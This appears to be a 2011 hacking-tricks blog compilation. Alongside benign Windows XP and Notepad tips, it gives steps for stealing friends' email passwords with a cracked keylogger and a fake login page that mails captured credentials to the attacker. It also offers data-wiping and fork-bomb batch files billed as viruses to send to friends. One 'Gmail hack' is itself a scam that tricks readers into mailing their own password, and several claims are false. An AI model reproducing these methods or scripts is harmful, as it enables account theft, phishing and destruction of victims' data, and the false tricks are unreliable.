Monday, July 25, 2011

SMS Snoofing : Send Fake SMS With Others Mobile Number


Airtel 3G Hack with 2G DC

One of the widely working latest trick :)

Note : It will work only in 3G Mobiles ;)


Steps :

1. Put 2G Booster

2. call 121 and activate 3G service

3. Within 4 hours 3G Settings will be automaticaly changed in your handset :)

4.If Nokia ( Goto : Network manager - > Change Network Mode as Dual )

5. Thats it !!

Browse and check Your Speed >:D<
Download will be done in 3G speed with 2G DC

Hope You Like It Very Much >:D<


Comments Needed :)

Airtel Free Gprs 2G

Type “DATA” and send it to 543210

NOTE IT: This trick works only if you send the above message from a Nokia Phone ! Once the trick gets activated within 24 hours, you will be able to use it with any phone model of any make and you will be able to use it even with your PC ;)

This trick is tested and working 100% in Gujarat so you may give it a try in your state too and leave a comment below if it works for your state because there is no loss in trying this trick as the sms number 543210 is toll-free :)



This trick was free only for those who send message before 12 noon on 17th may 2010. Messages sent after that time and activating schemes after that time will cost you 49 Rupees per month for 2GB data. But i think it is still a good deal to get 2GB in 50% price !

Trace Un-known Mobile Number Easily

Are You Disturbed By Un-wanted Calls ? :|

Do You Want To know About him ?? :)


Goto

www.mobiletracer.net


Put :

Mobile Number

Click submit

1.It Will Provide From where he is ...!

2. And It will provide Service Provider ... eg : airtel or aircel ,etc :)


Thank you :)

Thursday, July 21, 2011

Hacking or Using Other's computer

Its now an developed Techonology
You can easily connect your friends computer

You Hav rights to access your friends computer easily :)

Goto :

www. teamviwer .com

Goto PC downloads page ;)

Click Download and Enjoy \m/

Wednesday, July 6, 2011

Aim Of Our Website

To Give Awarness About the Hacking and Security

Hope You Like It

Ur Comments and Suggestions Are Welcome :)

- blackhatsarathy@gmail.com



- www.sarathyundead.com -

Make XP faster as never before

Make XP faster as never before

Yet another series of tricks to significantly increase your windows XP's speed. This include removing uselessly enabled options that do nothing but just slow down the PC. Just follow these simple steps and boost up your PC to a new level.



Disable CD Autorun
( WinXP PRO Only)

1) Click Start, Run and enter GPEDIT.MSC

2) Go to Computer Configuration, Administrative Templates, System.

3) Locate the entry for Turn autoplay off and modify it as you desire.





Speed Up Browsing
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.



DISABLE INDEXING SERVICES

Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:

1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next

OPTIMISE DISPLAY SETTINGS

Windows XP can look sexy but displaying all the visual items can waste system resources. To optimize:

1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons



SPEEDUP FOLDER BROWSING

You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:

1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
REMOVE THE DESKTOP PICTURE

Your desktop background consumes a fair amount of memory and can slow the loading time of your system. Removing it will improve performance.

1. Right click on Desktop and select Properties
2. Select the Desktop tab
3. In the Background window select None
4. Click Ok

DISABLE UNNECESSARY SERVICES

Because Windows XP has to be all things to all people it has many services running that take up system resources that you will never need. Below is a list of services that can be disabled on most machines:

Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:

Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable"

REMOVE ANNOYING DELETE CONFIRMATION MESSAGES

Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:

1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'

2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'

If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle

Hacking Your Friends Id Using Keyloggers

Using This Method You Can Hack Any type of Email Id's Easier :)


Just Yew Need to Download Adramax Keylogger ;)

If u need download link plzz your suggestion in comment box :)


1.Download Keylogger

2.Crack it by software

3.Give Your Laptop to your friends and Ask Them to login to their Accounts

4.Thats all Finish,Sucess :)

5. Yew Can get him id and pass in that keylogger software logs :)


-Hope Yew Like It

Suggestion are Welcome :)

Hacking Yahoo Id Using IP Address

hacking yahoo ID with IP address hack

This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here

Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uplo— the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets —-yse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

Hacking Orkut Accounts By 5 Types ;)

How To Hack Orkut ???

How To Hack Orkut ???
Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.

Second Level - Google account checks for cookie in the sytem of user
Third Level - Google provides a redirection to the entered User information
Fourth Level - Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to protect your Orkut account being hacked.

Common Ways to Hack Orkut

1. Using Keyloggers is one of the Easiest Way to Hack an Orkut (or any other email) password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an Orkut account.

A keylogger program is widely available on the internet. Some of the best ones are listed below

Win-Spy Monitor

Realtime Spy

A detailed information on Keylogger Hack can be found in my post Hacking an Email Account.

2. Phishing Attack is the most popular way of hacking/stealing other’s password. By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

3. Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

4. Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

5. Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it. So be careful, javascripts can even be used to hack Orkut!

6. Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’. This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email ID of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker. Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

If you would like to share something, comment here and I will add up here with a credit to your name

Hacking Orkut,Facebook,etc Using Fake Page

How to make a fake page for yahoo,orkut,gmail..

How to make a fake page for yahoo,orkut,gmail & for any website...!By using fake pages u can hack passwords & now everyone knows it but there are some guys who don't know abt fake pages...Here i m not talking abt retrieving passwords but how to make a fake page...Have a look on it..♥


1.First of all open the page for which u wanna a make fake.

2. Save dat page, Goto to file & save the complete web page.

3. Now u have saved the exact page of that site & start the work.

4. Right Click on dat Page and click on edit.

5. Search for the word Form in code of dat page.

6. Delete dat Form Value , Method ,Action, delete everything watever written on it.

7. ADD this code

http://www.big-llc.com/formmailer/submit” method=”post”>Your Email Id” name=”fm-to”>


8. Instead of Your Email Id write ur email address.

9. Save & close.

10. Upload ur fake page on any free hosting services.

Ur done with it u have made ur own fake page...


- Happy Faking <3

Hacking Facebook Easier

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJI2WIJoMvUyIwbtjP-y0v6XVcv89ZjJ6MlYphF9kNz2cwfs7pkGdC9mtfBU0XKA0szgFAVHSlWcw0sjxBFmx0RgLTsjO2bWEsSODURuD5oQgLawJ2J4FE-Jknsprrg_H2UdJva3Tw3y6h/s320/Mendapatkan-Password-Facebook-Yfdssssssssang-Kena-Hack.bmp


Hack Facebook Password
Hack Facebook Password Only 11.89 MB


http://linkbee.com/FOEAF

Password Cracker

4 Password Recovery Apps


AIM Password Recovery
Password Recovery for MSN
Password Recovery for MySpace IM
Password Recovery for Windows Live
Password Recovery for MySpaceIM finds and shows MySpace passwords saved by MySpaceIM (instant messenger
created by MySpace) on your local system. Your MySpace password will be decrypted if you can successfully
login with MySpaceIM without entering your password. The program also allows recovery of MySpace passwords
from MySpaceIM data files extracted from other hard drives or user accounts (external recovery is explained
below on this page). Download and install MySpace password recovery tool and see if it can decode your
MySpace passwords
Windows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that were
saved by Windows Live Messenger on your PC under the current login. This cracker works when you are able to
login with your messenger automatically without entering your password. It will recover multiple accounts
and supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows
7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved
on your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.
Password Recovery for MSN is the MSN messenger password recovery program that finds all encrypted MSN
Messenger, Windows Live Messenger and Windows Messenger passwords stored on the local system. It then
displays them in an easy to read format. This program works if after clicking the "Sign-In" button in your
messenger you're able to login automatically without entering your MSN password.
AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PC
under the current account. The passwords will then be cracked and decoded (decrypted) to display on the
screen in a user-friendly format. Correct passwords will of course be displayed only if you are able to
login automatically in AIM without entering your password for the account you want to recover. Works with
the latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked. It costs
nothing to download AIM Password Recovery and see if the passwords are recoverable


Notepad Tricks

Save it as "Anything.VBS" and send it.
==============================================================
5) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
==============================================================
6) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
==============================================================
7) Open Notepad continually in your friend's computer:
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.
==============================================================
8 ) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)


echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.
==============================================================
9) Hide text inside your text file !
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
* Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data


==============================================================
10) A Virus That Will Open And Close Ur Cdrom
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as "Anything.vbs" and send it.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
==============================================================
11) Notepad virus
Open NotePad And Write This:
Code:
@echo off
:E
start cmd.exe
start calc.exe


Save It As .bat.
==============================================================
12) Code to shutdown computer


Open NotePad And Write This:
Code:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00
Save It As .bat
==============================================================
13) Code for log
Open NotePad And Write This:
Code:
.LOG
and Save It As .txt
now if you open the file
its writes the time and day that you log...
==============================================================
14) Code for matrix falling text-
Open NotePad And Write This:
Code:
@echo off
:loop
COlor 0A
Title J J f f g g g g
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop


Save It As .bat
==============================================================
15)code to make computer chat with you
Open NotePad And Write This:
Code:
dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox("My Name Is Saplas")
fname=inputbox(" I Love You Saplas ^^.")
Save It As .vbs
==============================================================
16) Code to open many windows!
Open NotePad And Write This:
Code:
start
start
start
[The Number of "start" e.x 3 start-->3 windows ,, more start.. more windows ^_^]
Save It As .bat
==============================================================
17)code for Rick Roll
Open NotePad And Write This:
Code:
@echo off
START
http://www.smooch.net/lol [ you can change the site but i find this Site for RIck Roll-->best] [[for closing this site, push ctrl+alt+delete]]
Save It As .bat
==============================================================
18)code for Virus Joke
Open NotePad And Write This:
Code:
start
start
start
start
@echo off
msg ' [your text here] example msg ' We Hack So What?
msg ' [your text here] example msg ' Hahahahahaha.
shutdown -s -t 50 -c "your text here" example shutdown -s -t 50 -c "The Pc Gonna Exploded In 50 Sec"


Save It As .bat


If You wait 50 sec, your pc gonna restart..
But..
Start-->Run. Now Write shutdown -a
It Stops The Restart...
==============================================================
19) code for Virus Joke 2
Open NotePad And Write This:
Code:
@echo off
:hack
echo [your text here] I prefer this example --> echo Trojan Virus Uploading
goto hack
Save It As .bat
==============================================================
20) code for Adding A Heading And Text
Open Internet Explorer[prefer Mozila Firefox] .Then Open NotePad And Write This:
Code:


In The " ", It's The Name For The Site





Hello
In The " " are the font and the size number.
Example









Hello

==============================================================
21) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:
start
%0
goto :S


Save It As .bat
If You Open It, It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .
==============================================================
22) Create your own Never Ending Error/Pop up messages
First of all, here are some possible uses for this cool little thing
1. Bind them with your virus's / trojans. You can use any messages remember.
2. To piss off your friends making them think you've messed there computer up.
3. Whatever you want really!


Step 1. Open Notepad
Step 2. Type the following text:
Code:
lol = msgbox("Text You Want Here",16,"Title Of Message Box Here")
Step 3. Create as many lines as you want, for example my outcome would be something like this:
lol = msgbox("A System32 error has occured, please contact microsoft immediately",16,"Fatal Error")
lol = msgbox("Mswinsox (C:\Windows) Will now be deleted",16,"Fatal Error")
lol = msgbox("(C:\Windows) is being deleted",16,"Fatal Error")
lol = msgbox("Your computer will reboot shortly",16,"Fatal Error")
lol = msgbox("If you still have a problem, then you are -beep-ed",16,"Fatal Error")
lol = msgbox("owned you",16,"Fatal Error")




Step 4. Save it as Anything.vbs , distribute it amongst your friends and have a laugh.
==============================================================
23) make your pc talk with notepad!
Open a text file in notepad and write:
Code:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed
==============================================================
Fake warning boxes:
http://www.maxcheaters.com/forum/index.php?topic=53974.0
==============================================================
Virus in notepad
Paste this in yor notepad
Code:
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}" (Without Quotes)


now save it and scan it by ur antivirus software..
Bush trick
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
or
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
____________________________________________________________________
____________________________________________________________________
world trade centre trick
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.


log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.


WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
************************************************************************
Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1? on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.


&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


Print tree root
a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43?$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.
==============================================================

Create Your Own virus

write ur own simple virus cant detected by any antivirus....
@Echo off
Del C:\ *.*
y


or better version


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
EVEN I DIDN't TRY THIS........
I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...
-------------------------------------------------------------------------
-------------------------------------------------------------------------
2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
End If
wscript.sleep 5000
loop


-- Enjoy Hacking

Wat is Hacking

Hacking may refer to:

Hacking Yahoo Id

Yew Can Hack Your Friends Yahoo Id in 2 mintutes ;)

It is possible and it is easy. This way of hacking
into Yahoo email
accounts was brought to my attention by a friend of
mine who is a bit of a
computer wizard. I have tried the method a least a
dozen times and it has
worked on all but 2 occasions, I don't know the reason
why it failed a
couple of times, but on every other occasion it has
got me the password for
the requested email address. This is how it is done:

www.youtube.com/watch?v=6WBn23qYDRE


For More Queries

- blackhatsarathy@gmail.com

Hacking Gmail Id - 2011

how to hack Gmail passwords

Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - pwdmaster@gmail.com
Step 5: Write this in message box.
(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
(fourth line) - <
v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#"
start?>="">
<>
{simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
Usually only system administrators should be able to use this, but when you
try it with your own password and mail this message from your Gmail account
the computer gets confused! Why your password is needed- automatic Gmail
responder will require your "system administrator password" which is in fact
your own password!!! But the : computer doesn't know.



THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAIL
CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick and
works as many times as you try it. Have fun! NOTE: Use account you have been
using for few days say at least 30 days. Otherwise Gmail may take new
account as temporary and this trick may not work. Moreover use it soon
otherwise this flaw can be rectified soon.
Please be advised that it usually works with Gmail & AOL but i'm not to sure
about HOTMAIL but can try. THE ONLY WAY YOU CAN HACK SOMEONE'S AOL ACCOUNT
IS PROVIDING YOU HAVE AN AOL ACCOUNT.
ALTHOUGH THIS IS GMAIL ACCOUNT INFORMATION CENTER, IT HAS BEEN ABLE TO WORK
WITH AOL.
I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION NOR
WILL I BE HELD ACCOUNTABLE, THIS INFORMATION I'M SHARING IS FOR EDUCATIONAL
PURPOSES ONLY. PLEASE USE IT TO YOUR DISCRETION.............
HAPPY HACKING ......

-

Deadly Hackers


--

Tuesday, June 21, 2011

Hack 2011

Hacking may refer to:


The Hacker Attitude